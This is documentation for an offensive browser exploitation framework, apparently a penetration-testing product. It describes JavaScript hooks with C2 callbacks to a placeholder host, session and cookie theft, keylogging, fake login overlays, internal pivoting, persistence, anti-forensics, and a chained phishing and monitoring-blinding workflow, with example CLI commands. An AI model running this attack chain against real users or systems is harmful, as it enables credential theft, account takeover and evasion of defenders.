Red Specter BANSHEE

Pure Python Browser Exploitation Framework — 8 modules. 986 tests. Hook. Steal. Pivot. Persist.

v1.0.0
Contents
Overview Installation Quick Start HOOK Module SESSION Module KEYLOG Module RECON Module INJECT Module PIVOT Module PERSIST Module EVADE Module UNLEASHED Mode CLI Reference The Triple Report Output Disclaimer

Overview

BANSHEE is a pure Python browser exploitation framework. Zero external dependencies. No Ruby runtime. No Java. No Node.js. Every hook engine, C2 server, payload encoder, persistence mechanism, and evasion technique built from scratch using Python stdlib. The last thing they hear before it's over.

Eight modules. 986 tests. 5 hook types. 3 obfuscation levels. From a single JavaScript hook delivered through a link, BANSHEE captures sessions, logs keystrokes, fingerprints browsers, injects DOM overlays, pivots into internal networks, persists through Service Workers, and evades forensic detection.

Pure Python Zero external dependencies. Python C2 server.
8 Modules Hook, session, keylog, recon, inject, pivot, persist, evade.
986 Tests Full test coverage across every module.
Encrypted C2 TLS WebSocket channels with custom encoding.

Installation

$ pip install red-specter-banshee

Also available as .deb and PKGBUILD (BlackArch).

Or from source:

$ git clone <repo> $ cd red-specter-banshee $ pip install -e ".[dev]"

Quick Start

# Start C2 listener $ banshee listen --port 8443 --tls # Generate hook payload $ banshee hook --type inline --obfuscate 2 # Inject into target $ banshee inject --overlay login --session sid_7f3a9b2c # Extract session data $ banshee session --extract --session sid_7f3a9b2c # Pivot into internal network $ banshee pivot --scan --session sid_7f3a9b2c # UNLEASHED mode $ banshee engage --full --override --confirm-destroy

HOOK Module

JavaScript hook injection with encrypted C2 communication. Multiple hook types for different delivery scenarios. Three obfuscation levels to evade WAFs and content filters.

01 Capabilities banshee hook
# Inline hook (for XSS injection) $ banshee hook --type inline --obfuscate 2 # External hook (script tag delivery) $ banshee hook --type external --c2 https://c2.example.com:8443 # WebSocket hook (real-time bidirectional) $ banshee hook --type websocket --obfuscate 3

SESSION Module

Complete browser session extraction. Cookies, tokens, localStorage, sessionStorage, IndexedDB. Session cloning for account takeover without credentials.

02 Capabilities banshee session

KEYLOG Module

Targeted keystroke capture. Focuses on high-value input: passwords, credit cards, and form submissions. Encrypted exfiltration via C2 channel.

03 Capabilities

RECON Module

Browser and network reconnaissance from inside the hooked browser. Fingerprinting, IP discovery, and internal network mapping.

04 Capabilities
WebRTC Leak Discover real internal IP even behind VPN connections
Canvas Fingerprint Unique browser identification through rendering differences
Internal Discovery Map internal services reachable from the browser
Extension Detection Identify security extensions that may detect the hook

INJECT Module

DOM manipulation for credential harvesting. Fake login overlays, form hijacking, and phishing injection within the legitimate site context.

05 Capabilities banshee inject

PIVOT Module

Turn the hooked browser into a proxy into the internal network. Scan internal services, bypass CORS restrictions, and access resources behind the firewall.

06 Capabilities banshee pivot
# Scan internal network via hooked browser $ banshee pivot --scan --range 10.0.0.0/24 --session sid_7f3a9b2c # Proxy through hooked browser $ banshee pivot --proxy --port 1080 --session sid_7f3a9b2c

PERSIST Module

Survival mechanisms that keep the hook active across page reloads, browser restarts, and user navigation. No files on disk. No processes to kill.

07 Capabilities banshee persist

EVADE Module

Anti-detection and anti-forensics capabilities. Detect when the operator opens DevTools. Bypass Content Security Policies. Clean up when detection is imminent.

08 Capabilities

BANSHEE UNLEASHED

Cryptographic override. Private key controlled. One operator. Founder's machine only.

Standard mode demonstrates capability and reports attack paths. UNLEASHED mode executes live hook injection, real credential capture, and active pivoting through the browser.

CapabilityStandardUNLEASHED
Hook injectionDemonstrate deliveryLive JS injection with encrypted C2
Session theftReport accessible dataExtract and exfiltrate credentials
KeyloggingDetect fieldsLive capture and exfiltration
DOM injectionReport contextsLive overlay injection
Network pivotingReport reachActive internal scanning
PersistenceReport vectorsRegister Service Workers
Key requiredNoEd25519
# UNLEASHED (dry run) $ banshee engage --full --override # UNLEASHED (live — authorised environments only) $ banshee engage --full --override --confirm-destroy

UNLEASHED mode is restricted to authorised operators with Ed25519 private key access. Live browser exploitation must only occur in authorised test environments with explicit written permission. UNLEASHED mode captures real credentials and session data. Unauthorised use will violate applicable law.

CLI Reference

Commands

CommandDescription
banshee listenStart C2 listener
banshee hookGenerate hook payload
banshee injectInject DOM overlay
banshee sessionExtract session data
banshee pivotPivot into internal network
banshee persistEstablish persistence
banshee engageFull engagement (all modules)
banshee versionShow version information

Options

FlagDescription
--portC2 listener port
--tlsEnable TLS on C2 channel
--typeHook type: inline, external, event, mutation, websocket
--obfuscateObfuscation level: 1, 2, 3
--sessionTarget hooked session ID
--overlayInjection overlay type: login, timeout, mfa
--overrideUNLEASHED dry-run
--confirm-destroyUNLEASHED live execution
--outputOutput directory

The Triple

BANSHEE is the centre of "The Triple" — three tools that chain together for complete browser-based compromise. SPECTER SOCIAL delivers the link. BANSHEE hooks the browser. SCREAMER blinds the operator monitoring the attack.

07 SPECTER SOCIAL Delivers link
18 BANSHEE Hooks browser
11 SCREAMER Blinds operator
Social Delivery SPECTER SOCIAL crafts targeted phishing to deliver the hook URL
Browser Exploitation BANSHEE captures sessions, keystrokes, and pivots internally
Operator Blindness SCREAMER corrupts monitoring dashboards during the attack
NEMESIS Orchestration The Supreme Commander chains all three autonomously

Report Output

Every BANSHEE engagement produces comprehensive reports documenting all captured data, discovered attack paths, and exploitation evidence.

JSON + Text Machine-readable and human-readable output
Session Data All captured cookies, tokens, and credentials
Network Map Internal services discovered via browser pivoting
Attack Timeline Chronological record of all exploitation actions
# Export engagement data $ banshee session --export --session sid_7f3a9b2c --output ./reports

Disclaimer

Red Specter BANSHEE is designed for authorised security testing, research, and educational purposes only. Browser exploitation techniques demonstrated by BANSHEE can capture real credentials, session tokens, and sensitive data. You must have explicit written permission from the system owner before running BANSHEE against any target. Testing must only occur in authorised environments with appropriate controls in place. Unauthorised use may violate the Computer Misuse Act 1990 (UK), the Computer Fraud and Abuse Act (US), or equivalent legislation in your jurisdiction. The authors accept no liability for misuse or damage resulting from improper use.